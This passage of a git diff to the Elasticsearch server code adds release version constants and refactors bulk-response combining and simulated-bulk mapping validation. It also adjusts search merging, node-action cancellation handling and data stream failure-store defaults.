a/server/src/main/java/org/elasticsearch/Version.java +++ b/server/src/main/java/org/elasticsearch/Version.java @@ -205,19 +205,34 @@ public class Version implements VersionId, ToXContentFragment { public static final Version V_8_17_7 = new Version(8_17_07_99); public static final Version V_8_17_8 = new Version(8_17_08_99); public static final Version V_8_17_9 = new Version(8_17_09_99); + public static final Version V_8_17_10 = new Version(8_17_10_99); public static final Version V_8_18_0 = new 
Version(8_18_00_99); public static final Version V_8_18_1 = new Version(8_18_01_99); public static final Version V_8_18_2 = new Version(8_18_02_99); public static final Version V_8_18_3 = new Version(8_18_03_99); public static final Version V_8_18_4 = new Version(8_18_04_99); + public static final Version V_8_18_5 = new Version(8_18_05_99); + public static final Version V_8_18_6 = new Version(8_18_06_99); + public static final Version V_8_18_7 = new Version(8_18_07_99); public static final Version V_8_19_0 = new Version(8_19_00_99); + public static final Version V_8_19_1 = new Version(8_19_01_99); + public static final Version V_8_19_2 = new Version(8_19_02_99); + public static final Version V_8_19_3 = new Version(8_19_03_99); + public static final Version V_8_19_4 = new Version(8_19_04_99); public static final Version V_9_0_0 = new Version(9_00_00_99); public static final Version V_9_0_1 = new Version(9_00_01_99); public static final Version V_9_0_2 = new Version(9_00_02_99); public static final Version V_9_0_3 = new Version(9_00_03_99); public static final Version V_9_0_4 = new Version(9_00_04_99); + public static final Version V_9_0_5 = new Version(9_00_05_99); + public static final Version V_9_0_6 = new Version(9_00_06_99); + public static final Version V_9_0_7 = new Version(9_00_07_99); public static final Version V_9_1_0 = new Version(9_01_00_99); - public static final Version CURRENT = V_9_1_0; + public static final Version V_9_1_1 = new Version(9_01_01_99); + public static final Version V_9_1_2 = new Version(9_01_02_99); + public static final Version V_9_1_3 = new Version(9_01_03_99); + public static final Version V_9_1_4 = new Version(9_01_04_99); + public static final Version CURRENT = V_9_1_4; private static final NavigableMap VERSION_IDS; private static final Map VERSION_STRINGS; diff --git a/server/src/main/java/org/elasticsearch/action/bulk/BulkOperation.java b/server/src/main/java/org/elasticsearch/action/bulk/BulkOperation.java index 9c5f40577b32c..a9f0146ab03d3 100644 --- a/server/src/main/java/org/elasticsearch/action/bulk/BulkOperation.java +++ b/server/src/main/java/org/elasticsearch/action/bulk/BulkOperation.java @@ -615,7 +615,6 @@ private IndexDocFailureStoreStatus processFailure(BulkItemRequest bulkItemReques * @return a data stream if the write request points to a data stream, or {@code null} if it does not */ private static DataStream getRedirectTargetCandidate(DocWriteRequest docWriteRequest, ProjectMetadata project) { - // PRTODO: We could check for cluster feature here instead // If there is no index abstraction, then the request is using a pattern of some sort, which data streams do not support IndexAbstraction ia = project.getIndicesLookup().get(docWriteRequest.index()); return DataStream.resolveDataStream(ia, project); diff --git a/server/src/main/java/org/elasticsearch/action/bulk/BulkResponse.java b/server/src/main/java/org/elasticsearch/action/bulk/BulkResponse.java index 567b433d94daf..97236b47e53aa 100644 --- a/server/src/main/java/org/elasticsearch/action/bulk/BulkResponse.java +++ b/server/src/main/java/org/elasticsearch/action/bulk/BulkResponse.java @@ -20,6 +20,7 @@ import java.io.IOException; import java.util.Iterator; +import java.util.List; /** * A response of a bulk execution. 
Holding a response for each item responding (in order) of the @@ -166,4 +167,32 @@ public Iterator toXContentChunked(ToXContent.Params params return builder.startArray(ITEMS); }), Iterators.forArray(responses), Iterators.single((builder, p) -> builder.endArray().endObject())); } + + /** + * Combine many bulk responses into one. + */ + public static BulkResponse combine(List responses) { + long tookInMillis = 0; + long ingestTookInMillis = NO_INGEST_TOOK; + int itemResponseCount = 0; + for (BulkResponse response : responses) { + tookInMillis += response.getTookInMillis(); + if (response.getIngestTookInMillis() != NO_INGEST_TOOK) { + if (ingestTookInMillis == NO_INGEST_TOOK) { + ingestTookInMillis = 0; + } + ingestTookInMillis += response.getIngestTookInMillis(); + } + itemResponseCount += response.getItems().length; + } + BulkItemResponse[] bulkItemResponses = new BulkItemResponse[itemResponseCount]; + int i = 0; + for (BulkResponse response : responses) { + for (BulkItemResponse itemResponse : response.getItems()) { + bulkItemResponses[i++] = itemResponse; + } + } + + return new BulkResponse(bulkItemResponses, tookInMillis, ingestTookInMillis); + } } diff --git a/server/src/main/java/org/elasticsearch/action/bulk/IncrementalBulkService.java b/server/src/main/java/org/elasticsearch/action/bulk/IncrementalBulkService.java index 81ff1925182eb..b2b4404f48d47 100644 --- a/server/src/main/java/org/elasticsearch/action/bulk/IncrementalBulkService.java +++ b/server/src/main/java/org/elasticsearch/action/bulk/IncrementalBulkService.java @@ -210,7 +210,7 @@ public void lastItems(List> items, Releasable releasable, Act @Override public void onResponse(BulkResponse bulkResponse) { handleBulkSuccess(bulkResponse); - listener.onResponse(combineResponses()); + listener.onResponse(BulkResponse.combine(responses)); } @Override @@ -252,7 +252,7 @@ private void errorResponse(ActionListener listener) { if (globalFailure) { listener.onFailure(bulkActionLevelFailure); } else { - listener.onResponse(combineResponses()); + listener.onResponse(BulkResponse.combine(responses)); } } @@ -311,25 +311,5 @@ private void createNewBulkRequest(BulkRequest.IncrementalState incrementalState) bulkRequest.setRefreshPolicy(refresh); } } - - private BulkResponse combineResponses() { - long tookInMillis = 0; - long ingestTookInMillis = 0; - int itemResponseCount = 0; - for (BulkResponse response : responses) { - tookInMillis += response.getTookInMillis(); - ingestTookInMillis += response.getIngestTookInMillis(); - itemResponseCount += response.getItems().length; - } - BulkItemResponse[] bulkItemResponses = new BulkItemResponse[itemResponseCount]; - int i = 0; - for (BulkResponse response : responses) { - for (BulkItemResponse itemResponse : response.getItems()) { - bulkItemResponses[i++] = itemResponse; - } - } - - return new BulkResponse(bulkItemResponses, tookInMillis, ingestTookInMillis); - } } } diff --git a/server/src/main/java/org/elasticsearch/action/bulk/TransportSimulateBulkAction.java b/server/src/main/java/org/elasticsearch/action/bulk/TransportSimulateBulkAction.java index ac807bf1d752c..85e9f2c5084de 100644 --- a/server/src/main/java/org/elasticsearch/action/bulk/TransportSimulateBulkAction.java +++ b/server/src/main/java/org/elasticsearch/action/bulk/TransportSimulateBulkAction.java @@ -69,6 +69,7 @@ import java.util.HashMap; import java.util.List; import java.util.Map; +import java.util.Optional; import java.util.Set; import java.util.concurrent.Executor; @@ -198,32 +199,15 @@ private Tuple, Exception> 
validateMappings( Collection ignoredFields = List.of(); IndexAbstraction indexAbstraction = project.getIndicesLookup().get(request.index()); try { - if (indexAbstraction != null - && componentTemplateSubstitutions.isEmpty() - && indexTemplateSubstitutions.isEmpty() - && mappingAddition.isEmpty()) { + if (indexAbstraction != null && componentTemplateSubstitutions.isEmpty() && indexTemplateSubstitutions.isEmpty()) { /* - * In this case the index exists and we don't have any component template overrides. So we can just use withTempIndexService - * to do the mapping validation, using all the existing logic for validation. + * In this case the index exists and we don't have any template overrides. So we can just merge the mappingAddition (which + * might not exist) into the existing index mapping. */ IndexMetadata imd = project.getIndexSafe(indexAbstraction.getWriteIndex(request, project)); - indicesService.withTempIndexService(imd, indexService -> { - indexService.mapperService().updateMapping(null, imd); - return IndexShard.prepareIndex( - indexService.mapperService(), - sourceToParse, - SequenceNumbers.UNASSIGNED_SEQ_NO, - -1, - -1, - VersionType.INTERNAL, - Engine.Operation.Origin.PRIMARY, - Long.MIN_VALUE, - false, - request.ifSeqNo(), - request.ifPrimaryTerm(), - 0 - ); - }); + CompressedXContent mappings = Optional.ofNullable(imd.mapping()).map(MappingMetadata::source).orElse(null); + CompressedXContent mergedMappings = mappingAddition == null ? null : mergeMappings(mappings, mappingAddition); + ignoredFields = validateUpdatedMappingsFromIndexMetadata(imd, mergedMappings, request, sourceToParse); } else { /* * The index did not exist, or we have component template substitutions, so we put together the mappings from existing @@ -296,15 +280,6 @@ private Tuple, Exception> validateMappings( ); final CompressedXContent combinedMappings = mergeMappings(new CompressedXContent(mappingsMap), mappingAddition); ignoredFields = validateUpdatedMappings(null, combinedMappings, request, sourceToParse); - } else if (indexAbstraction != null && mappingAddition.isEmpty() == false) { - /* - * The index matched no templates of any kind, including the substitutions. But it might have a mapping. So we - * merge in the mapping addition if it exists, and validate. - */ - MappingMetadata mappingFromIndex = project.index(indexAbstraction.getName()).mapping(); - CompressedXContent currentIndexCompressedXContent = mappingFromIndex == null ? null : mappingFromIndex.source(); - CompressedXContent combinedMappings = mergeMappings(currentIndexCompressedXContent, mappingAddition); - ignoredFields = validateUpdatedMappings(null, combinedMappings, request, sourceToParse); } else { /* * The index matched no templates and had no mapping of its own. 
If there were component template substitutions @@ -332,9 +307,6 @@ private Collection validateUpdatedMappings( IndexRequest request, SourceToParse sourceToParse ) throws IOException { - if (updatedMappings == null) { - return List.of(); // no validation to do - } Settings dummySettings = Settings.builder() .put(IndexMetadata.SETTING_VERSION_CREATED, IndexVersion.current()) .put(IndexMetadata.SETTING_NUMBER_OF_SHARDS, 1) @@ -346,8 +318,20 @@ private Collection validateUpdatedMappings( originalIndexMetadataBuilder.putMapping(new MappingMetadata(originalMappings)); } final IndexMetadata originalIndexMetadata = originalIndexMetadataBuilder.build(); + return validateUpdatedMappingsFromIndexMetadata(originalIndexMetadata, updatedMappings, request, sourceToParse); + } + + private Collection validateUpdatedMappingsFromIndexMetadata( + IndexMetadata originalIndexMetadata, + @Nullable CompressedXContent updatedMappings, + IndexRequest request, + SourceToParse sourceToParse + ) throws IOException { + if (updatedMappings == null) { + return List.of(); // no validation to do + } final IndexMetadata updatedIndexMetadata = IndexMetadata.builder(request.index()) - .settings(dummySettings) + .settings(originalIndexMetadata.getSettings()) .putMapping(new MappingMetadata(updatedMappings)) .build(); Engine.Index result = indicesService.withTempIndexService(originalIndexMetadata, indexService -> { diff --git a/server/src/main/java/org/elasticsearch/action/datastreams/autosharding/DataStreamAutoShardingService.java b/server/src/main/java/org/elasticsearch/action/datastreams/autosharding/DataStreamAutoShardingService.java index 61eb2867790a2..b5c884be746dc 100644 --- a/server/src/main/java/org/elasticsearch/action/datastreams/autosharding/DataStreamAutoShardingService.java +++ b/server/src/main/java/org/elasticsearch/action/datastreams/autosharding/DataStreamAutoShardingService.java @@ -26,6 +26,7 @@ import org.elasticsearch.core.Nullable; import org.elasticsearch.core.TimeValue; import org.elasticsearch.index.Index; +import org.elasticsearch.index.IndexMode; import org.elasticsearch.index.shard.IndexingStats; import java.util.Arrays; @@ -371,6 +372,7 @@ public String toString() { * there'll be no new auto sharding event) */ public AutoShardingResult calculate(ProjectState state, DataStream dataStream, @Nullable IndexStats writeIndexStats) { + if (isAutoShardingEnabled == false) { logger.debug("Data stream auto-sharding service is not enabled."); return NOT_APPLICABLE_RESULT; @@ -385,6 +387,11 @@ public AutoShardingResult calculate(ProjectState state, DataStream dataStream, @ return NOT_APPLICABLE_RESULT; } + if (dataStream.getIndexMode() == IndexMode.LOOKUP) { + logger.debug("Data stream [{}] has indexing mode LOOKUP; auto-sharding is not applicable.", dataStream.getName()); + return NOT_APPLICABLE_RESULT; + } + if (writeIndexStats == null) { logger.debug( "Data stream auto-sharding service cannot compute the optimal number of shards for data stream [{}] as the write index " diff --git a/server/src/main/java/org/elasticsearch/action/search/OpenPointInTimeResponse.java b/server/src/main/java/org/elasticsearch/action/search/OpenPointInTimeResponse.java index b3ffc564d848c..f8243097e80a3 100644 --- a/server/src/main/java/org/elasticsearch/action/search/OpenPointInTimeResponse.java +++ b/server/src/main/java/org/elasticsearch/action/search/OpenPointInTimeResponse.java @@ -59,7 +59,7 @@ public void writeTo(StreamOutput out) throws IOException { public XContentBuilder toXContent(XContentBuilder builder, Params 
params) throws IOException { builder.startObject(); builder.field("id", Base64.getUrlEncoder().encodeToString(BytesReference.toBytes(pointInTimeId))); - buildBroadcastShardsHeader(builder, params, totalShards, successfulShards, failedShards, skippedShards, null); + buildBroadcastShardsHeader(builder, params, totalShards, successfulShards, skippedShards, failedShards, null); builder.endObject(); return builder; } diff --git a/server/src/main/java/org/elasticsearch/action/search/SearchPhaseController.java b/server/src/main/java/org/elasticsearch/action/search/SearchPhaseController.java index 7339135fe93dc..2df4c05722908 100644 --- a/server/src/main/java/org/elasticsearch/action/search/SearchPhaseController.java +++ b/server/src/main/java/org/elasticsearch/action/search/SearchPhaseController.java @@ -9,6 +9,8 @@ package org.elasticsearch.action.search; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; import org.apache.lucene.search.FieldDoc; import org.apache.lucene.search.ScoreDoc; import org.apache.lucene.search.Sort; @@ -72,6 +74,8 @@ public final class SearchPhaseController { + private static final Logger logger = LogManager.getLogger(SearchPhaseController.class); + private final BiFunction< Supplier, AggregatorFactories.Builder, @@ -153,17 +157,22 @@ static TopDocs mergeTopDocs(List results, int topN, int from) { return topDocs; } final TopDocs mergedTopDocs; - if (topDocs instanceof TopFieldGroups firstTopDocs) { - final Sort sort = validateSameSortTypesAndMaybeRewrite(results, firstTopDocs.fields); - TopFieldGroups[] shardTopDocs = topDocsList.toArray(new TopFieldGroups[0]); - mergedTopDocs = TopFieldGroups.merge(sort, from, topN, shardTopDocs, false); - } else if (topDocs instanceof TopFieldDocs firstTopDocs) { - TopFieldDocs[] shardTopDocs = topDocsList.toArray(new TopFieldDocs[0]); - final Sort sort = validateSameSortTypesAndMaybeRewrite(results, firstTopDocs.fields); - mergedTopDocs = TopDocs.merge(sort, from, topN, shardTopDocs); - } else { - final TopDocs[] shardTopDocs = topDocsList.toArray(new TopDocs[0]); - mergedTopDocs = TopDocs.merge(from, topN, shardTopDocs); + try { + if (topDocs instanceof TopFieldGroups firstTopDocs) { + final Sort sort = validateSameSortTypesAndMaybeRewrite(results, firstTopDocs.fields); + TopFieldGroups[] shardTopDocs = topDocsList.toArray(new TopFieldGroups[0]); + mergedTopDocs = TopFieldGroups.merge(sort, from, topN, shardTopDocs, false); + } else if (topDocs instanceof TopFieldDocs firstTopDocs) { + TopFieldDocs[] shardTopDocs = topDocsList.toArray(new TopFieldDocs[0]); + final Sort sort = validateSameSortTypesAndMaybeRewrite(results, firstTopDocs.fields); + mergedTopDocs = TopDocs.merge(sort, from, topN, shardTopDocs); + } else { + final TopDocs[] shardTopDocs = topDocsList.toArray(new TopDocs[0]); + mergedTopDocs = TopDocs.merge(from, topN, shardTopDocs); + } + } catch (IllegalArgumentException e) { + logger.debug("Failed to merge top docs: ", e); + throw e; } return mergedTopDocs; } diff --git a/server/src/main/java/org/elasticsearch/action/search/SearchQueryThenFetchAsyncAction.java b/server/src/main/java/org/elasticsearch/action/search/SearchQueryThenFetchAsyncAction.java index f0be39208c902..51406d8c9ad19 100644 --- a/server/src/main/java/org/elasticsearch/action/search/SearchQueryThenFetchAsyncAction.java +++ b/server/src/main/java/org/elasticsearch/action/search/SearchQueryThenFetchAsyncAction.java @@ -177,7 +177,17 @@ && getRequest().scroll() == null } } } - bottomSortCollector.consumeTopDocs(topDocs, 
queryResult.sortValueFormats()); + try { + bottomSortCollector.consumeTopDocs(topDocs, queryResult.sortValueFormats()); + } catch (Exception e) { + // In case the collecting fails, e.g. because of a formatting error, we log the error and continue + logger.debug( + "failed to consume top docs for shard [{}] with sort fields [{}]: {}", + result.getShardIndex(), + Arrays.toString(topDocs.fields), + e + ); + } } super.onShardResult(result); } @@ -457,6 +467,7 @@ protected void doRun(Map shardIndexMap) { executeAsSingleRequest(routing, request.shards.getFirst()); return; } + String nodeId = routing.nodeId(); final Transport.Connection connection; try { connection = getConnection(routing.clusterAlias(), routing.nodeId()); @@ -508,6 +519,7 @@ public void handleResponse(NodeQueryResponse response) { @Override public void handleException(TransportException e) { Exception cause = (Exception) ExceptionsHelper.unwrapCause(e); + logger.debug("handling node search exception coming from [" + nodeId + "]", cause); if (e instanceof SendRequestTransportException || cause instanceof TaskCancelledException) { // two possible special cases here where we do not want to fail the phase: // failure to send out the request -> handle things the same way a shard would fail with unbatched execution @@ -550,7 +562,7 @@ private void onNodeQueryFailure(Exception e, NodeQueryRequest request, CanMatchP } } - private static final String NODE_SEARCH_ACTION_NAME = "indices:data/read/search[query][n]"; + public static final String NODE_SEARCH_ACTION_NAME = "indices:data/read/search[query][n]"; static void registerNodeSearchAction( SearchTransportService searchTransportService, @@ -708,8 +720,8 @@ private void setFailure(QueryPerNodeState state, int dataNodeLocalIdx, Exception @Override public void onFailure(Exception e) { - // TODO: count down fully and just respond with an exception if partial results aren't allowed as an - // optimization + // Note: this shard won't be retried until it returns to the coordinating node where the shard iterator lives + // TODO: consider alternatives that don't wait for the entire batch to complete before retrying the shard setFailure(state, dataNodeLocalIdx, e); doneFuture.onResponse(null); } diff --git a/server/src/main/java/org/elasticsearch/action/search/TransportSearchHelper.java b/server/src/main/java/org/elasticsearch/action/search/TransportSearchHelper.java index 4e3544f0170cb..0e9b0811015d1 100644 --- a/server/src/main/java/org/elasticsearch/action/search/TransportSearchHelper.java +++ b/server/src/main/java/org/elasticsearch/action/search/TransportSearchHelper.java @@ -10,7 +10,7 @@ package org.elasticsearch.action.search; import org.apache.lucene.util.BytesRef; -import org.elasticsearch.TransportVersions; +import org.elasticsearch.TransportVersion; import org.elasticsearch.common.bytes.BytesReference; import org.elasticsearch.common.io.stream.BytesStreamOutput; import org.elasticsearch.common.io.stream.InputStreamStreamInput; @@ -127,14 +127,14 @@ private static SearchContextIdForNode innerReadSearchContextIdForNode(String con */ public static void checkCCSVersionCompatibility(Writeable writeableRequest) { try { - writeableRequest.writeTo(new VersionCheckingStreamOutput(TransportVersions.MINIMUM_CCS_VERSION)); + writeableRequest.writeTo(new VersionCheckingStreamOutput(TransportVersion.minimumCCSVersion())); } catch (Exception e) { // if we cannot serialize, raise this as an error to indicate to the caller that CCS has problems with this request throw new IllegalArgumentException( "[" 
+ writeableRequest.getClass() + "] is not compatible with version " - + TransportVersions.MINIMUM_CCS_VERSION.toReleaseVersion() + + TransportVersion.minimumCCSVersion().toReleaseVersion() + " and the '" + SearchService.CCS_VERSION_CHECK_SETTING.getKey() + "' setting is enabled.", diff --git a/server/src/main/java/org/elasticsearch/action/support/nodes/TransportNodesAction.java b/server/src/main/java/org/elasticsearch/action/support/nodes/TransportNodesAction.java index 96b1e1e1efca4..181d935d97f37 100644 --- a/server/src/main/java/org/elasticsearch/action/support/nodes/TransportNodesAction.java +++ b/server/src/main/java/org/elasticsearch/action/support/nodes/TransportNodesAction.java @@ -42,6 +42,7 @@ import java.util.List; import java.util.Objects; import java.util.concurrent.Executor; +import java.util.concurrent.atomic.AtomicBoolean; import static org.elasticsearch.core.Strings.format; @@ -99,6 +100,7 @@ protected void doExecute(Task task, NodesRequest request, ActionListener responses = new ArrayList<>(concreteNodes.length); final ArrayList exceptions = new ArrayList<>(0); + final AtomicBoolean responsesHandled = new AtomicBoolean(false); final TransportRequestOptions transportRequestOptions = TransportRequestOptions.timeout(request.timeout()); @@ -109,12 +111,14 @@ protected void doExecute(Task task, NodesRequest request, ActionListener { - final List drainedResponses; - synchronized (responses) { - drainedResponses = List.copyOf(responses); - responses.clear(); + if (responsesHandled.compareAndSet(false, true)) { + final List drainedResponses; + synchronized (responses) { + drainedResponses = List.copyOf(responses); + responses.clear(); + } + Releasables.wrap(Iterators.map(drainedResponses.iterator(), r -> r::decRef)).close(); } - Releasables.wrap(Iterators.map(drainedResponses.iterator(), r -> r::decRef)).close(); }); } } @@ -161,10 +165,18 @@ protected void onItemFailure(DiscoveryNode discoveryNode, Exception e) { @Override protected CheckedConsumer, Exception> onCompletion() { - // ref releases all happen-before here so no need to be synchronized return l -> { - try (var ignored = Releasables.wrap(Iterators.map(responses.iterator(), r -> r::decRef))) { - newResponseAsync(task, request, actionContext, responses, exceptions, l); + if (responsesHandled.compareAndSet(false, true)) { + // ref releases all happen-before here so no need to be synchronized + try (var ignored = Releasables.wrap(Iterators.map(responses.iterator(), r -> r::decRef))) { + newResponseAsync(task, request, actionContext, responses, exceptions, l); + } + } else { + logger.debug("task cancelled after all responses were collected"); + assert task instanceof CancellableTask : "expect CancellableTask, but got: " + task; + final var cancellableTask = (CancellableTask) task; + assert cancellableTask.isCancelled(); + cancellableTask.notifyIfCancelled(l); } }; } diff --git a/server/src/main/java/org/elasticsearch/bootstrap/Elasticsearch.java b/server/src/main/java/org/elasticsearch/bootstrap/Elasticsearch.java index 5e3c5d026f283..8b59a59dcf313 100644 --- a/server/src/main/java/org/elasticsearch/bootstrap/Elasticsearch.java +++ b/server/src/main/java/org/elasticsearch/bootstrap/Elasticsearch.java @@ -256,6 +256,7 @@ private static void initPhase2(Bootstrap bootstrap) throws IOException { scopeResolver::resolveClassToScope, nodeEnv.settings()::getValues, nodeEnv.dataDirs(), + nodeEnv.sharedDataDir(), nodeEnv.repoDirs(), nodeEnv.configDir(), nodeEnv.libDir(), @@ -267,11 +268,18 @@ private static void initPhase2(Bootstrap 
bootstrap) throws IOException { args.pidFile(), Set.of(EntitlementSelfTester.class.getPackage()) ); - EntitlementSelfTester.entitlementSelfTest(); + entitlementSelfTest(); bootstrap.setPluginsLoader(pluginsLoader); } + /** + * @throws IllegalStateException if entitlements aren't functioning properly. + */ + static void entitlementSelfTest() { + EntitlementSelfTester.entitlementSelfTest(); + } + private static void logSystemInfo() { final Logger logger = LogManager.getLogger(Elasticsearch.class); logger.info( diff --git a/server/src/main/java/org/elasticsearch/cluster/ClusterModule.java b/server/src/main/java/org/elasticsearch/cluster/ClusterModule.java index 5633bd8b89e1e..a54695475b504 100644 --- a/server/src/main/java/org/elasticsearch/cluster/ClusterModule.java +++ b/server/src/main/java/org/elasticsearch/cluster/ClusterModule.java @@ -380,6 +380,13 @@ public static List getNamedXWriteables() { DesiredNodesMetadata::fromXContent ) ); + entries.add( + new NamedXContentRegistry.Entry( + Metadata.ProjectCustom.class, + new ParseField(StreamsMetadata.TYPE), + StreamsMetadata::fromXContent + ) + ); return entries; } diff --git a/server/src/main/java/org/elasticsearch/cluster/ClusterState.java b/server/src/main/java/org/elasticsearch/cluster/ClusterState.java index d5356bd54b845..534272051ca8c 100644 --- a/server/src/main/java/org/elasticsearch/cluster/ClusterState.java +++ b/server/src/main/java/org/elasticsearch/cluster/ClusterState.java @@ -241,7 +241,7 @@ public ClusterState( assert assertConsistentRoutingNodes(routingTable, nodes, routingNodes); assert assertConsistentProjectState(routingTable, metadata); this.minVersions = blocks.hasGlobalBlock(STATE_NOT_RECOVERED_BLOCK) - ? new CompatibilityVersions(TransportVersions.MINIMUM_COMPATIBLE, Map.of()) // empty map because cluster state is unknown + ? 
new CompatibilityVersions(TransportVersion.minimumCompatible(), Map.of()) // empty map because cluster state is unknown : CompatibilityVersions.minimumVersions(compatibilityVersions.values()); assert compatibilityVersions.isEmpty() diff --git a/server/src/main/java/org/elasticsearch/cluster/RepositoryCleanupInProgress.java b/server/src/main/java/org/elasticsearch/cluster/RepositoryCleanupInProgress.java index 0e57c18248447..a1abb4647e957 100644 --- a/server/src/main/java/org/elasticsearch/cluster/RepositoryCleanupInProgress.java +++ b/server/src/main/java/org/elasticsearch/cluster/RepositoryCleanupInProgress.java @@ -9,7 +9,6 @@ package org.elasticsearch.cluster; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.metadata.ProjectId; import org.elasticsearch.common.Strings; import org.elasticsearch.common.collect.Iterators; @@ -109,7 +108,7 @@ public String toString() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public record Entry(ProjectId projectId, String repository, long repositoryStateId) implements Writeable, RepositoryOperation { diff --git a/server/src/main/java/org/elasticsearch/cluster/RestoreInProgress.java b/server/src/main/java/org/elasticsearch/cluster/RestoreInProgress.java index a084276de9112..26ad63e9172b2 100644 --- a/server/src/main/java/org/elasticsearch/cluster/RestoreInProgress.java +++ b/server/src/main/java/org/elasticsearch/cluster/RestoreInProgress.java @@ -10,7 +10,6 @@ package org.elasticsearch.cluster; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.admin.cluster.snapshots.restore.RestoreSnapshotRequest; import org.elasticsearch.cluster.ClusterState.Custom; import org.elasticsearch.common.collect.Iterators; @@ -269,7 +268,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } public static NamedDiff readDiffFrom(StreamInput in) throws IOException { diff --git a/server/src/main/java/org/elasticsearch/cluster/SnapshotDeletionsInProgress.java b/server/src/main/java/org/elasticsearch/cluster/SnapshotDeletionsInProgress.java index 8136719612ce6..bdd5dd25daba2 100644 --- a/server/src/main/java/org/elasticsearch/cluster/SnapshotDeletionsInProgress.java +++ b/server/src/main/java/org/elasticsearch/cluster/SnapshotDeletionsInProgress.java @@ -10,7 +10,6 @@ package org.elasticsearch.cluster; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.ClusterState.Custom; import org.elasticsearch.cluster.metadata.ProjectId; import org.elasticsearch.common.UUIDs; @@ -167,7 +166,7 @@ public static NamedDiff readDiffFrom(StreamInput in) throws IOException @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/server/src/main/java/org/elasticsearch/cluster/SnapshotsInProgress.java b/server/src/main/java/org/elasticsearch/cluster/SnapshotsInProgress.java index 8390c00fc420a..049af499cefd6 100644 --- a/server/src/main/java/org/elasticsearch/cluster/SnapshotsInProgress.java +++ b/server/src/main/java/org/elasticsearch/cluster/SnapshotsInProgress.java @@ -302,7 +302,7 @@ public String getWriteableName() { @Override public 
TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } private static final TransportVersion DIFFABLE_VERSION = TransportVersions.V_8_5_0; @@ -1826,7 +1826,7 @@ public SnapshotsInProgress apply(Custom part) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/ComponentTemplateMetadata.java b/server/src/main/java/org/elasticsearch/cluster/metadata/ComponentTemplateMetadata.java index 123fb4f9f6d2e..4bd86b540c52f 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/ComponentTemplateMetadata.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/ComponentTemplateMetadata.java @@ -10,7 +10,6 @@ package org.elasticsearch.cluster.metadata; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.DiffableUtils; import org.elasticsearch.cluster.NamedDiff; @@ -89,7 +88,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override @@ -166,7 +165,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } } diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/ComposableIndexTemplateMetadata.java b/server/src/main/java/org/elasticsearch/cluster/metadata/ComposableIndexTemplateMetadata.java index eec34514b9c7c..596fa18a0cee2 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/ComposableIndexTemplateMetadata.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/ComposableIndexTemplateMetadata.java @@ -10,7 +10,6 @@ package org.elasticsearch.cluster.metadata; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.DiffableUtils; import org.elasticsearch.cluster.NamedDiff; @@ -94,7 +93,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override @@ -167,7 +166,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } } diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/DataStream.java b/server/src/main/java/org/elasticsearch/cluster/metadata/DataStream.java index 69e15a2b98889..a72d2edb4ea34 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/DataStream.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/DataStream.java @@ -211,7 +211,12 @@ public DataStream( lifecycle, dataStreamOptions, new DataStreamIndices(BACKING_INDEX_PREFIX, List.copyOf(indices), rolloverOnWrite, autoShardingEvent), - new DataStreamIndices(FAILURE_STORE_PREFIX, List.copyOf(failureIndices), false, null) + new DataStreamIndices( + FAILURE_STORE_PREFIX, + List.copyOf(failureIndices), + (replicated == false && failureIndices.isEmpty()), + null + ) ); } @@ -280,8 +285,15 @@ public static DataStream read(StreamInput in) throws IOException { 
backingIndicesBuilder.setAutoShardingEvent(in.readOptionalWriteable(DataStreamAutoShardingEvent::new)); } if (in.getTransportVersion().onOrAfter(TransportVersions.V_8_15_0)) { - failureIndicesBuilder.setRolloverOnWrite(in.readBoolean()) + // Read the rollover on write flag from the stream, but force it on if the failure indices are empty and we're not replicating + boolean failureStoreRolloverOnWrite = in.readBoolean() || (replicated == false && failureIndices.isEmpty()); + failureIndicesBuilder.setRolloverOnWrite(failureStoreRolloverOnWrite) .setAutoShardingEvent(in.readOptionalWriteable(DataStreamAutoShardingEvent::new)); + } else { + // If we are reading from an older version that does not have these fields, just default + // to a reasonable value for rollover on write for the failure store + boolean failureStoreRolloverOnWrite = replicated == false && failureIndices.isEmpty(); + failureIndicesBuilder.setRolloverOnWrite(failureStoreRolloverOnWrite); } DataStreamOptions dataStreamOptions; if (in.getTransportVersion().onOrAfter(TransportVersions.V_8_16_0)) { @@ -1434,7 +1446,11 @@ public void writeTo(StreamOutput out) throws IOException { new DataStreamIndices( FAILURE_STORE_PREFIX, args[13] != null ? (List) args[13] : List.of(), - args[14] != null && 